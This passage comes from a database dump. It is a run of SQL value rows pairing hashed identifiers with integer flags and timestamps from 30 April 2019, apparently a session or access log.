(85282, 'cc784e71f7499aae51bd3b5ec4b51b65', 'fb737e7d6672ebaa', 0, 2, 1, '2019-04-30 12:15:14'),
(85283, 'cc784e71f7499aae51bd3b5ec4b51b65', 'fb737e7d6672ebaa', 0, 2, 1, '2019-04-30 12:19:25'),
(85284, 'cc784e71f7499aae51bd3b5ec4b51b65', 'fb737e7d6672ebaa', 0, 2, 1, '2019-04-30 12:19:59'),
(85285, 'cc784e71f7499aae51bd3b5ec4b51b65', 'fb737e7d6672ebaa', 0, 2, 1, '2019-04-30 12:22:26'),
(85286, 'cc784e71f7499aae51bd3b5ec4b51b65', 'fb737e7d6672ebaa', 0, 2, 1, '2019-04-30 12:22:47'),
(85287, 'cc784e71f7499aae51bd3b5ec4b51b65', 'fb737e7d6672ebaa', 0, 2, 1, '2019-04-30 12:23:22'),
(85288, '4d6435b11e756623e6693498467f0d99', '2ee6e8c258f5d2a5', 0, 2, 1, '2019-04-30 12:33:48'),
(85289, '2730a0f5e5d4d693bfb436942dd89a51', 'd79ba0d3a2363667', 0, 2, 1, '2019-04-30 13:29:34'),
(85290, 'bc237fe59a805d8393af2dfd6bbacaca', '301dde2812f8696c', 0, 2, 1, '2019-04-30 13:34:27'),
(85291, 'a4fdb225b8cb982fa696df1b7b5a4c3c', '846dcc220c9d1cd7', 0, 2, 1, '2019-04-30 13:34:29'),
(85292, '563c214bb682a7401527bb7645903d28', '56b08af584d59109', 0, 2, 1, '2019-04-30 14:20:23'),
(85293, '8744c1ec93710d4cb8e6e450c7da9761', '7fbede89a3682353', 0, 2, 1, '2019-04-30 14:25:39'),
(85294, '596462c41e26d1d5c606b26f443b9ce3', '56b08af584d59109', 0, 2, 1, '2019-04-30 14:41:58'),
(85295, 'f5e3d0ff8404d4ed0c835bc67ac743e8', '8e09af3765497db8', 0, 2, 1, '2019-04-30 15:35:59'),
(85296, '336aab1aab470bcbfcdd11a423e41f5c', '5fe5ed0a8d9afb2a', 0, 2, 1, '2019-04-30 15:40:38'),
(85297, '336aab1aab470bcbfcdd11a423e41f5c', '5fe5ed0a8d9afb2a', 0, 2, 1, '2019-04-30 15:41:03'),
(85298, '336aab1aab470bcbfcdd11a423e41f5c', '5fe5ed0a8d9afb2a', 0, 2, 1, '2019-04-30 15:41:08'),
(85299, 'bc237fe59a805d8393af2dfd6bbacaca', '301dde2812f8696c', 0, 2, 1, '2019-04-30 15:42:06'),
(85300, 'f457e14ae7488aafac9c1a12c32faf2a', '32b169e936bbe5df', 0, 2, 1, '2019-04-30 15:42:11'),
(85301, '336aab1aab470bcbfcdd11a423e41f5c', '5fe5ed0a8d9afb2a', 0, 2, 1, '2019-04-30 15:42:21'),
(85302, '336aab1aab470bcbfcdd11a423e41f5c', '5fe5ed0a8d9afb2a', 0, 2, 1, '2019-04-30 15:42:48'),
(85303, '336aab1aab470bcbfcdd11a423e41f5c', '5fe5ed0a8d9afb2a', 0, 2, 1, '2019-04-30 15:43:23'),
(85304, '5428767c019cf8096ec03229e17139db', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-30 15:49:44'),
(85305, '21c768586cf8a3dee78ac088222171a4', '71a9bc493c887fe8', 0, 2, 1, '2019-04-30 15:50:48'),
(85306, '21c768586cf8a3dee78ac088222171a4', '71a9bc493c887fe8', 0, 2, 1, '2019-04-30 15:51:03'),
(85307, '5428767c019cf8096ec03229e17139db', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-30 15:52:59'),
(85308, '21c768586cf8a3dee78ac088222171a4', '71a9bc493c887fe8', 0, 2, 1, '2019-04-30 15:53:02'),
(85309, '4579fc099a6ffb523bc82bed8f9a31e3', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-30 15:53:07'),
(85310, 'c358057a74397b834c4febdcb9a1801c', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-30 15:53:27'),
(85311, 'dd4599779cea89f44e6720969ed67be8', '29ef45db200a8f59', 0, 2, 1, '2019-04-30 15:53:35'),
(85312, '5428767c019cf8096ec03229e17139db', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-30 15:54:01'),
(85313, 'c358057a74397b834c4febdcb9a1801c', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-30 15:54:13'),
(85314, '4579fc099a6ffb523bc82bed8f9a31e3', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-30 15:55:02'),
(85315, '5428767c019cf8096ec03229e17139db', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-30 15:56:54'),
(85316, 'f2934818d05996fee95c363a92fbc23f', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-30 15:57:06'),
(85317, '0165c1702e2c1c4f8a8dda7463f31721', 'b867a665203ab878', 0, 2, 1, '2019-04-30 15:58:11'),
(85318, 'ae762be704368c54b402adf0df05e5e8', 'a4d9d8225838853d', 0, 2, 1, '2019-04-30 15:58:11'),
(85319, 'f2934818d05996fee95c363a92fbc23f', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-30 15:58:21'),
(85320, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 15:58:27'),
(85321, '4579fc099a6ffb523bc82bed8f9a31e3', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-30 15:58:31'),
(85322, 'dd4599779cea89f44e6720969ed67be8', '29ef45db200a8f59', 0, 2, 1, '2019-04-30 15:58:56'),
(85323, 'e638df1e74fae275e041c0475ea37c61', '332723ec6654d9f5', 0, 2, 1, '2019-04-30 15:58:59'),
(85324, '648f20c006fad2060ca293adc8479358', 'ec18b138536ee06e', 0, 2, 1, '2019-04-30 15:59:05'),
(85325, '91b6623722bd623dd02d45ee4baf8313', 'b2bafb74467116e9', 0, 2, 1, '2019-04-30 15:59:21'),
(85326, '49c2842db4b4cbb0310810fec73f9242', 'df2f194cea195593', 0, 2, 1, '2019-04-30 15:59:37'),
(85327, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 15:59:45'),
(85328, 'a46daeee37fd114e66ceef81f999ca89', 'dd85277cbb7da2c1', 0, 2, 1, '2019-04-30 15:59:56'),
(85329, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:00:00'),
(85330, '1f0c82c3954190a5639ab2f08fd87f6f', 'dace6e0c219330fc', 0, 2, 1, '2019-04-30 16:00:07'),
(85331, '21c768586cf8a3dee78ac088222171a4', '71a9bc493c887fe8', 0, 2, 1, '2019-04-30 16:00:14'),
(85332, 'a4fdb225b8cb982fa696df1b7b5a4c3c', '846dcc220c9d1cd7', 0, 2, 1, '2019-04-30 16:00:19'),
(85333, 'f457e14ae7488aafac9c1a12c32faf2a', '32b169e936bbe5df', 0, 2, 1, '2019-04-30 16:00:20'),
(85334, 'a46daeee37fd114e66ceef81f999ca89', 'dd85277cbb7da2c1', 0, 2, 1, '2019-04-30 16:00:21'),
(85335, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:00:33'),
(85336, '21c768586cf8a3dee78ac088222171a4', '71a9bc493c887fe8', 0, 2, 1, '2019-04-30 16:00:46'),
(85337, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:00:47'),
(85338, 'f2934818d05996fee95c363a92fbc23f', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-30 16:00:54'),
(85339, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:01:03'),
(85340, 'ae762be704368c54b402adf0df05e5e8', 'a4d9d8225838853d', 0, 2, 1, '2019-04-30 16:01:08'),
(85341, 'a824b5a06f2244d3aa641bb080337502', '503a514a8daa32a7', 0, 2, 1, '2019-04-30 16:01:15'),
(85342, 'e638df1e74fae275e041c0475ea37c61', '332723ec6654d9f5', 0, 2, 1, '2019-04-30 16:01:21'),
(85343, '8691dcc251210eb6e8825a4843ce2772', 'df27b9a2919a8206', 0, 2, 1, '2019-04-30 16:01:30'),
(85344, '1f0c82c3954190a5639ab2f08fd87f6f', 'dace6e0c219330fc', 0, 2, 1, '2019-04-30 16:01:32'),
(85345, '21c768586cf8a3dee78ac088222171a4', '71a9bc493c887fe8', 0, 2, 1, '2019-04-30 16:01:48'),
(85346, 'fd096a93c22a097af715d6132a15f006', '07e7c740f81a635a', 0, 2, 1, '2019-04-30 16:02:02'),
(85347, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:02:13'),
(85348, '5428767c019cf8096ec03229e17139db', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-30 16:02:16'),
(85349, 'ae762be704368c54b402adf0df05e5e8', 'a4d9d8225838853d', 0, 2, 1, '2019-04-30 16:02:28'),
(85350, 'e638df1e74fae275e041c0475ea37c61', '332723ec6654d9f5', 0, 2, 1, '2019-04-30 16:02:40'),
(85351, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:02:48'),
(85352, '91b6623722bd623dd02d45ee4baf8313', 'b2bafb74467116e9', 0, 2, 1, '2019-04-30 16:03:01'),
(85353, 'dd4599779cea89f44e6720969ed67be8', '29ef45db200a8f59', 0, 2, 1, '2019-04-30 16:03:05'),
(85354, 'e638df1e74fae275e041c0475ea37c61', '332723ec6654d9f5', 0, 2, 1, '2019-04-30 16:03:07'),
(85355, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:03:24'),
(85356, 'fd096a93c22a097af715d6132a15f006', '07e7c740f81a635a', 0, 2, 1, '2019-04-30 16:03:31'),
(85357, '2ade9db6ed4ff6b180b02007144a2bf5', '7501b42c35accff7', 0, 2, 1, '2019-04-30 16:03:36'),
(85358, 'f457e14ae7488aafac9c1a12c32faf2a', '32b169e936bbe5df', 0, 2, 1, '2019-04-30 16:03:51'),
(85359, 'f2934818d05996fee95c363a92fbc23f', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-30 16:03:54'),
(85360, 'e4476b34b858a7d1c3b61842f810f48d', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-04-30 16:03:58'),
(85361, 'ae762be704368c54b402adf0df05e5e8', 'a4d9d8225838853d', 0, 2, 1, '2019-04-30 16:04:02'),
(85362, 'a824b5a06f2244d3aa641bb080337502', '503a514a8daa32a7', 0, 2, 1, '2019-04-30 16:04:12'),
(85363, 'fd096a93c22a097af715d6132a15f006', '07e7c740f81a635a', 0, 2, 1, '2019-04-30 16:04:18'),
(85364, '4579fc099a6ffb523bc82bed8f9a31e3', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-30 16:04:34'),
(85365, '8691dcc251210eb6e8825a4843ce2772', 'df27b9a2919a8206', 0, 2, 1, '2019-04-30 16:04:39'),
(85366, '5428767c019cf8096ec03229e17139db', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-30 16:04:51'),
(85367, 'fd096a93c22a097af715d6132a15f006', '07e7c740f81a635a', 0, 2, 1, '2019-04-30 16:05:02'),
(85368, '21c768586cf8a3dee78ac088222171a4', '71a9bc493c887fe8', 0, 2, 1, '2019-04-30 16:05:09'),
(85369, 'f457e14ae7488aafac9c1a12c32faf2a', '32b169e936bbe5df', 0, 2, 1, '2019-04-30 16:05:15'),
(85370, 'dd4599779cea89f44e6720969ed67be8', '29ef45db200a8f59', 0, 2, 1, '2019-04-30 16:05:40'),
(85371, 'e4476b34b858a7d1c3b61842f810f48d', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-04-30 16:05:42'),
(85372, '4579fc099a6ffb523bc82bed8f9a31e3', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-30 16:05:52'),
(85373, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:05:55'),
(85374, '5428767c019cf8096ec03229e17139db', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-30 16:05:57'),
(85375, '21c768586cf8a3dee78ac088222171a4', '71a9bc493c887fe8', 0, 2, 1, '2019-04-30 16:05:58'),
(85376, 'c800bb87a535e658aa43327e55b88d34', '9ab9f70575d108ed', 0, 2, 1, '2019-04-30 16:05:58'),
(85377, '8744c1ec93710d4cb8e6e450c7da9761', '7fbede89a3682353', 0, 2, 1, '2019-04-30 16:06:03'),
(85378, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:06:06'),
(85379, 'c800bb87a535e658aa43327e55b88d34', '9ab9f70575d108ed', 0, 2, 1, '2019-04-30 16:06:14'),
(85380, 'a4fdb225b8cb982fa696df1b7b5a4c3c', '846dcc220c9d1cd7', 0, 2, 1, '2019-04-30 16:06:14'),
(85381, '8744c1ec93710d4cb8e6e450c7da9761', '7fbede89a3682353', 0, 2, 1, '2019-04-30 16:06:14'),
(85382, 'a824b5a06f2244d3aa641bb080337502', '503a514a8daa32a7', 0, 2, 1, '2019-04-30 16:06:25'),
(85383, '34dbee8f28c64faefb6682aee0b06d8e', '1c68b977b911188c', 0, 2, 1, '2019-04-30 16:06:53'),
(85384, 'e638df1e74fae275e041c0475ea37c61', '332723ec6654d9f5', 0, 2, 1, '2019-04-30 16:06:53'),
(85385, '1f0c82c3954190a5639ab2f08fd87f6f', 'dace6e0c219330fc', 0, 2, 1, '2019-04-30 16:07:12'),
(85386, 'a46daeee37fd114e66ceef81f999ca89', 'dd85277cbb7da2c1', 0, 2, 1, '2019-04-30 16:07:19'),
(85387, 'f457e14ae7488aafac9c1a12c32faf2a', '32b169e936bbe5df', 0, 2, 1, '2019-04-30 16:07:32'),
(85388, 'dd4599779cea89f44e6720969ed67be8', '29ef45db200a8f59', 0, 2, 1, '2019-04-30 16:07:34'),
(85389, 'a9879d58fa2f96ec66dc802859c016ea', 'c7d4ce8b0de12339', 0, 2, 1, '2019-04-30 16:07:36'),
(85390, '8744c1ec93710d4cb8e6e450c7da9761', '7fbede89a3682353', 0, 2, 1, '2019-04-30 16:07:38'),
(85391, 'e46de991bdbbdaa512ea081a1837a484', '390c8ebb4f0af7ce', 0, 2, 1, '2019-04-30 16:07:38'),
(85392, 'a824b5a06f2244d3aa641bb080337502', '503a514a8daa32a7', 0, 2, 1, '2019-04-30 16:07:40'),
(85393, '21c768586cf8a3dee78ac088222171a4', '71a9bc493c887fe8', 0, 2, 1, '2019-04-30 16:07:46'),
(85394, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:07:47'),
(85395, 'e638df1e74fae275e041c0475ea37c61', '332723ec6654d9f5', 0, 2, 1, '2019-04-30 16:07:51'),
(85396, 'ccf497366930786c88a60e84826b1a65', 'edfe950d47379572', 0, 2, 1, '2019-04-30 16:07:52'),
(85397, '93a1c857ca8b044765290dc4aeb5b4ca', 'a639f655bef0fc87', 0, 2, 1, '2019-04-30 16:07:52'),
(85398, 'dd4599779cea89f44e6720969ed67be8', '29ef45db200a8f59', 0, 2, 1, '2019-04-30 16:07:57'),
(85399, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:07:58'),
(85400, '43394a578835dbf51a68e3487cf3b93a', 'abc5ec7aefe03208', 0, 2, 1, '2019-04-30 16:08:07'),
(85401, 'ccf497366930786c88a60e84826b1a65', 'edfe950d47379572', 0, 2, 1, '2019-04-30 16:08:09'),
(85402, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:08:09'),
(85403, 'a89d2bc5b907fbf0b9059512853f2e35', '00a1e8daf077053f', 0, 2, 1, '2019-04-30 16:08:15'),
(85404, 'e4476b34b858a7d1c3b61842f810f48d', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-04-30 16:08:19'),
(85405, 'f2934818d05996fee95c363a92fbc23f', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-30 16:08:21'),
(85406, 'e4476b34b858a7d1c3b61842f810f48d', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-04-30 16:08:22'),
(85407, '5428767c019cf8096ec03229e17139db', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-30 16:08:23'),
(85408, 'a89d2bc5b907fbf0b9059512853f2e35', '00a1e8daf077053f', 0, 2, 1, '2019-04-30 16:08:24'),
(85409, 'fd096a93c22a097af715d6132a15f006', '07e7c740f81a635a', 0, 2, 1, '2019-04-30 16:08:28'),
(85410, 'e638df1e74fae275e041c0475ea37c61', '332723ec6654d9f5', 0, 2, 1, '2019-04-30 16:08:28'),
(85411, '43394a578835dbf51a68e3487cf3b93a', 'abc5ec7aefe03208', 0, 2, 1, '2019-04-30 16:08:29'),
(85412, 'c9b8112cb489c2dce8371cc6c8b7982b', '38b62ea69ffc6898', 0, 2, 1, '2019-04-30 16:08:34'),
(85413, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:08:35'),
(85414, 'ae762be704368c54b402adf0df05e5e8', 'a4d9d8225838853d', 0, 2, 1, '2019-04-30 16:08:36'),
(85415, 'a824b5a06f2244d3aa641bb080337502', '503a514a8daa32a7', 0, 2, 1, '2019-04-30 16:08:41'),
(85416, 'fd096a93c22a097af715d6132a15f006', '07e7c740f81a635a', 0, 2, 1, '2019-04-30 16:08:58'),
(85417, 'c9b8112cb489c2dce8371cc6c8b7982b', '38b62ea69ffc6898', 0, 2, 1, '2019-04-30 16:09:02'),
(85418, 'e20135d3c0a1a420372ac486379d1fba', '341775f19df6fd0a', 0, 2, 1, '2019-04-30 16:09:05'),
(85419, 'ae762be704368c54b402adf0df05e5e8', 'a4d9d8225838853d', 0, 2, 1, '2019-04-30 16:09:22'),
(85420, '22887cfd9ac014122f7df6efd8828b10', '9bd318e3c6005fb6', 0, 2, 1, '2019-04-30 16:09:32'),
(85421, 'f457e14ae7488aafac9c1a12c32faf2a', '32b169e936bbe5df', 0, 2, 1, '2019-04-30 16:09:36'),
(85422, '8691dcc251210eb6e8825a4843ce2772', 'df27b9a2919a8206', 0, 2, 1, '2019-04-30 16:09:41'),
(85423, '5428767c019cf8096ec03229e17139db', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-30 16:09:42'),
(85424, '91b6623722bd623dd02d45ee4baf8313', 'b2bafb74467116e9', 0, 2, 1, '2019-04-30 16:09:51'),
(85425, 'e4476b34b858a7d1c3b61842f810f48d', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-04-30 16:09:53'),
(85426, 'ae762be704368c54b402adf0df05e5e8', 'a4d9d8225838853d', 0, 2, 1, '2019-04-30 16:09:59'),
(85427, '4579fc099a6ffb523bc82bed8f9a31e3', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-30 16:10:14'),
(85428, '49c2842db4b4cbb0310810fec73f9242', 'df2f194cea195593', 0, 2, 1, '2019-04-30 16:10:18'),
(85429, 'd825e21758a26ad456a0ebf5b528deaf', '56785d740a552fbe', 0, 2, 1, '2019-04-30 16:10:18'),
(85430, 'cd96d7f6d5908bebad274d4901bcb367', '4b4d6e62e5b9831c', 0, 2, 1, '2019-04-30 16:10:22'),
(85431, 'd825e21758a26ad456a0ebf5b528deaf', '56785d740a552fbe', 0, 2, 1, '2019-04-30 16:10:31'),
(85432, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:10:32'),
(85433, 'e638df1e74fae275e041c0475ea37c61', '332723ec6654d9f5', 0, 2, 1, '2019-04-30 16:10:42'),
(85434, '2d1fcb649cf97623cd41b306de7e8c4b', '80fcba86aea88c51', 0, 2, 1, '2019-04-30 16:10:42'),
(85435, '1f0c82c3954190a5639ab2f08fd87f6f', 'dace6e0c219330fc', 0, 2, 1, '2019-04-30 16:10:46'),
(85436, '0eb01ffd02fe9700c2880542417b65cf', 'd131b6333aa3bbcb', 0, 2, 1, '2019-04-30 16:10:46'),
(85437, 'e638df1e74fae275e041c0475ea37c61', '332723ec6654d9f5', 0, 2, 1, '2019-04-30 16:10:48'),
(85438, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:10:50'),
(85439, '287a75c1bb8d9d2b0922ca239f23476b', '8ad24f4e888a3b80', 0, 2, 1, '2019-04-30 16:10:52'),
(85440, '2d1fcb649cf97623cd41b306de7e8c4b', '80fcba86aea88c51', 0, 2, 1, '2019-04-30 16:10:53'),
(85441, 'd825e21758a26ad456a0ebf5b528deaf', '56785d740a552fbe', 0, 2, 1, '2019-04-30 16:10:54'),
(85442, 'cd96d7f6d5908bebad274d4901bcb367', '4b4d6e62e5b9831c', 0, 2, 1, '2019-04-30 16:10:55'),
(85443, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:11:02'),
(85444, '287a75c1bb8d9d2b0922ca239f23476b', '8ad24f4e888a3b80', 0, 2, 1, '2019-04-30 16:11:08'),
(85445, '34dbee8f28c64faefb6682aee0b06d8e', '1c68b977b911188c', 0, 2, 1, '2019-04-30 16:11:24'),
(85446, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:11:25'),
(85447, 'e4476b34b858a7d1c3b61842f810f48d', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-04-30 16:11:38'),
(85448, 'a824b5a06f2244d3aa641bb080337502', '503a514a8daa32a7', 0, 2, 1, '2019-04-30 16:11:49'),
(85449, '93a1c857ca8b044765290dc4aeb5b4ca', 'a639f655bef0fc87', 0, 2, 1, '2019-04-30 16:11:52'),
(85450, 'f2934818d05996fee95c363a92fbc23f', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-30 16:11:52'),
(85451, 'e638df1e74fae275e041c0475ea37c61', '332723ec6654d9f5', 0, 2, 1, '2019-04-30 16:11:56'),
(85452, '6c4b06ee743fca22bcc5aeea7573878d', '5a072d21018c8a41', 0, 2, 1, '2019-04-30 16:12:06'),
(85453, 'a824b5a06f2244d3aa641bb080337502', '503a514a8daa32a7', 0, 2, 1, '2019-04-30 16:12:08'),
(85454, '6c4b06ee743fca22bcc5aeea7573878d', '5a072d21018c8a41', 0, 2, 1, '2019-04-30 16:12:36'),
(85455, 'fc96f0310bb8adf84ce246ef5bbd1ffc', 'b1b974139e0e43c6', 0, 2, 1, '2019-04-30 16:12:44'),
(85456, '4579fc099a6ffb523bc82bed8f9a31e3', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-30 16:12:47'),
(85457, 'a46daeee37fd114e66ceef81f999ca89', 'dd85277cbb7da2c1', 0, 2, 1, '2019-04-30 16:12:47'),
(85458, '1e516029c497947851cd597e48c6dd03', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-30 16:12:49'),
(85459, '225ff9927384fd66e41ea983e81a4c09', '7340106347808725', 0, 2, 1, '2019-04-30 16:13:05'),
(85460, '4579fc099a6ffb523bc82bed8f9a31e3', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-30 16:13:10'),
(85461, 'ae762be704368c54b402adf0df05e5e8', 'a4d9d8225838853d', 0, 2, 1, '2019-04-30 16:13:18'),
(85462, '43394a578835dbf51a68e3487cf3b93a', 'abc5ec7aefe03208', 0, 2, 1, '2019-04-30 16:13:21'),
(85463, '225ff9927384fd66e41ea983e81a4c09', '7340106347808725', 0, 2, 1, '2019-04-30 16:13:21'),
(85464, '8691dcc251210eb6e8825a4843ce2772', 'df27b9a2919a8206', 0, 2, 1, '2019-04-30 16:13:32'),
(85465, 'e638df1e74fae275e041c0475ea37c61', '332723ec6654d9f5', 0, 2, 1, '2019-04-30 16:13:34'),
(85466, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:13:35'),
(85467, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:13:39'),
(85468, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:13:49'),
(85469, 'd6352aaf4450e31623d5d826cba1b004', '21f069d24c94121b', 0, 2, 1, '2019-04-30 16:13:50'),
(85470, '8691dcc251210eb6e8825a4843ce2772', 'df27b9a2919a8206', 0, 2, 1, '2019-04-30 16:13:50'),
(85471, '4579fc099a6ffb523bc82bed8f9a31e3', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-30 16:13:56'),
(85472, 'e4476b34b858a7d1c3b61842f810f48d', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-04-30 16:14:02'),
(85473, 'e4476b34b858a7d1c3b61842f810f48d', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-04-30 16:14:22'),
(85474, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:14:45'),
(85475, 'a4fdb225b8cb982fa696df1b7b5a4c3c', '846dcc220c9d1cd7', 0, 2, 1, '2019-04-30 16:14:52'),
(85476, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:14:52'),
(85477, 'a824b5a06f2244d3aa641bb080337502', '503a514a8daa32a7', 0, 2, 1, '2019-04-30 16:15:05'),
(85478, 'e638df1e74fae275e041c0475ea37c61', '332723ec6654d9f5', 0, 2, 1, '2019-04-30 16:15:11'),
(85479, '6f1ac6c0188d40d16aacb6eb7b6a6bee', 'd7d80f86fea1400a', 0, 2, 1, '2019-04-30 16:15:14'),
(85480, '2ade9db6ed4ff6b180b02007144a2bf5', '7501b42c35accff7', 0, 2, 1, '2019-04-30 16:15:20'),
(85481, 'f457e14ae7488aafac9c1a12c32faf2a', '32b169e936bbe5df', 0, 2, 1, '2019-04-30 16:15:31'),
(85482, '8691dcc251210eb6e8825a4843ce2772', 'df27b9a2919a8206', 0, 2, 1, '2019-04-30 16:15:33'),
(85483, 'ae762be704368c54b402adf0df05e5e8', 'a4d9d8225838853d', 0, 2, 1, '2019-04-30 16:15:53'),
(85484, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:16:02'),
(85485, '6f1ac6c0188d40d16aacb6eb7b6a6bee', 'd7d80f86fea1400a', 0, 2, 1, '2019-04-30 16:16:25'),
(85486, 'd6352aaf4450e31623d5d826cba1b004', '21f069d24c94121b', 0, 2, 1, '2019-04-30 16:16:26'),
(85487, '2d1fcb649cf97623cd41b306de7e8c4b', '80fcba86aea88c51', 0, 2, 1, '2019-04-30 16:16:27'),
(85488, 'e638df1e74fae275e041c0475ea37c61', '332723ec6654d9f5', 0, 2, 1, '2019-04-30 16:16:28'),
(85489, '6f1ac6c0188d40d16aacb6eb7b6a6bee', 'd7d80f86fea1400a', 0, 2, 1, '2019-04-30 16:16:37'),
(85490, '2d1fcb649cf97623cd41b306de7e8c4b', '80fcba86aea88c51', 0, 2, 1, '2019-04-30 16:16:37'),
(85491, 'e4476b34b858a7d1c3b61842f810f48d', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-04-30 16:16:40'),
(85492, '7a1c08e5dc40f89fc9ecf6e67dab34f6', '399573dbcce3efbe', 0, 2, 1, '2019-04-30 16:16:40'),
(85493, 'e4476b34b858a7d1c3b61842f810f48d', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-04-30 16:16:45'),
(85494, '3c47d1254f8b9f686247541d58851f42', '3e2639227e08f6ff', 0, 2, 1, '2019-04-30 16:16:53'),
(85495, '4f2068f9cde8652ec2c7e794a0ca84c3', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-30 16:16:59'),
(85496, '8691dcc251210eb6e8825a4843ce2772', 'df27b9a2919a8206', 0, 2, 1, '2019-04-30 16:17:04'),
(85497, '2b89a118ffb36d5c272ee1b0f59e947c', '196ae7616c94df27', 0, 2, 1, '2019-04-30 16:17:07'),
(85498, 'a4fdb225b8cb982fa696df1b7b5a4c3c', '846dcc220c9d1cd7', 0, 2, 1, '2019-04-30 16:17:13'),
(85499, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:17:16'),
(85500, 'd6352aaf4450e31623d5d826cba1b004', '21f069d24c94121b', 0, 2, 1, '2019-04-30 16:17:24'),
(85501, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-04-30 16:17:24'),
(85502, '43394a578835dbf51a68e3487cf3b93a', 'abc5ec7aefe03208', 0, 2, 1, '2019-04-30 16:17:29'),
(85503, 'ae762be704368c54b402adf0df05e5e8', 'a4d9d8225838853d', 0, 2, 1, '2019-04-30 16:17:30'),
(85504, '8691dcc251210eb6e8825a4843ce2772', 'df27b9a2919a8206', 0, 2, 1, '2019-04-30 16:17:37'),
(85505, 'f7b8a370f2c4e55d5663fdca228ba974', '77e3b3bc6fe4e58b', 0, 2, 1, '2019-04-30 16:17:45'),
(85506, '0cc957c9b6823720bb39fda07ae25038', '7edff10c327f64f4', 0, 2, 1, '2019-04-30 16:17:50'),
(85507, '43394a578835dbf51a68e3487cf3b93a', 'abc5ec7aefe03208', 0, 2, 1, '2019-04-30 16:17:56'),
(85508, '0cc957c9b6823720bb39fda07ae25038', '7edff10c327f64f4', 0, 2, 1, '2019-04-30 16:18:03'),
(85509, '4579fc099a6ffb523bc82bed8f9a31e3', '87e2978d1d3d1a07', 0, 2, 1, '2019-04-30 16:18:03'),
(85510, 'fc96f0310bb8adf84ce246ef5bbd1ffc', 'b1b974139e0e43c6', 0, 2, 1, '2019-04-30 16:18:12'),
